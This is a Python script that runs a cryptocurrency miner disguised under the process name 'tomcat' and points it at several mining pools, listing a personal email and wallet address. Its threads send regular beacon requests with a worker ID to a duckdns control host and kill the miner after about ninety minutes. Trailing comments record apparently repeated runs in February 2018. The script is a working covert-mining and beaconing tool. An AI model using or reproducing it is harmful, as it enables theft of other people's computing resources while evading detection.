import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:24:04.116920
#2018-02-17 16:13:04.302764
#2018-02-17 18:00:09.926728
#2018-02-17 19:47:03.390413
#2018-02-17 21:34:05.254094
#2018-02-17 23:18:06.428101
#2018-02-18 01:06:07.543699
#2018-02-18 02:53:06.318287
#2018-02-18 04:42:07.156065
#2018-02-18 06:34:03.667881
#2018-02-18 08:22:05.255517
#2018-02-18 10:10:09.722532
#2018-02-18 11:56:04.726215
#2018-02-18 13:41:01.924029
#2018-02-18 15:32:06.494652
#2018-02-18 17:20:07.096840
#2018-02-18 19:09:01.644929
#2018-02-18 20:55:04.651544
#2018-02-18 22:41:04.399280
#2018-02-19 00:30:10.092657
#2018-02-19 02:15:06.257174
#2018-02-19 04:04:01.463518
#2018-02-19 05:47:06.013032
#2018-02-19 07:34:05.440440
#2018-02-19 09:24:02.213764
#2018-02-19 11:13:06.683560
#2018-02-19 13:01:06.514159
#2018-02-19 14:48:08.950316
#2018-02-19 16:38:04.403729
#2018-02-19 18:24:03.110811
#2018-02-19 20:10:11.693276
#2018-02-19 22:00:09.622988
#2018-02-19 23:47:01.988676
#2018-02-20 01:34:04.349050
#2018-02-20 03:22:04.667338
#2018-02-20 05:08:04.234173
#2018-02-20 06:51:05.733841
#2018-02-20 08:38:04.501674
#2018-02-20 10:23:01.368511
#2018-02-20 12:08:05.664585
#2018-02-20 13:57:05.097476
#2018-02-20 15:41:05.067492
#2018-02-20 17:26:06.832655
#2018-02-20 19:15:07.302866
#2018-02-20 21:05:08.538039
#2018-02-20 22:51:04.667317
#2018-02-21 00:33:04.273261
#2018-02-21 02:19:04.606429
#2018-02-21 04:06:06.006696
#2018-02-21 05:53:05.423532
#2018-02-21 07:42:04.873220
#2018-02-21 09:26:06.654098
#2018-02-21 11:15:01.844092
#2018-02-21 13:02:02.117182
#2018-02-21 14:49:01.995615
#2018-02-21 16:38:07.014027
#2018-02-21 18:27:05.944695
#2018-02-21 20:12:05.837885
#2018-02-21 21:59:04.951907
#2018-02-21 23:46:06.761530
#2018-02-22 01:37:03.610206
#2018-02-22 03:26:01.230960
#2018-02-22 05:13:07.477502
#2018-02-22 06:58:04.899813
#2018-02-22 08:46:02.020420
#2018-02-22 10:34:03.894343
#2018-02-22 12:20:01.461042
#2018-02-22 14:06:07.062267
#2018-02-22 15:52:09.300156
#2018-02-22 17:39:07.924423
#2018-02-22 19:25:10.544482
#2018-02-22 21:16:08.014553
#2018-02-22 23:01:04.422410
#2018-02-23 00:47:04.086289
#2018-02-23 02:37:07.927643
#2018-02-23 04:25:08.063857
#2018-02-23 06:12:04.801940
#2018-02-23 07:58:07.199149
#2018-02-23 10:14:06.885129
#2018-02-23 12:02:02.024660
#2018-02-23 13:50:01.364517
#2018-02-23 15:40:05.628873
#2018-02-23 17:27:07.364345
#2018-02-23 19:16:06.465059
#2018-02-23 21:00:10.184508
#2018-02-23 22:46:04.171541
#2018-02-24 00:34:04.217218
#2018-02-24 02:25:09.431537
#2018-02-24 04:17:01.906552
#2018-02-24 06:05:06.056691
#2018-02-24 07:55:04.682210
#2018-02-24 09:38:05.360431
#2018-02-24 11:35:07.811384
#2018-02-24 13:25:06.975954
#2018-02-24 15:14:02.239510
#2018-02-24 17:03:06.468958
#2018-02-24 18:53:05.502788
#2018-02-24 20:42:02.005282
#2018-02-24 22:51:05.746214
#2018-02-25 02:11:06.868418
#2018-02-25 05:34:01.209382
#2018-02-25 11:34:05.663024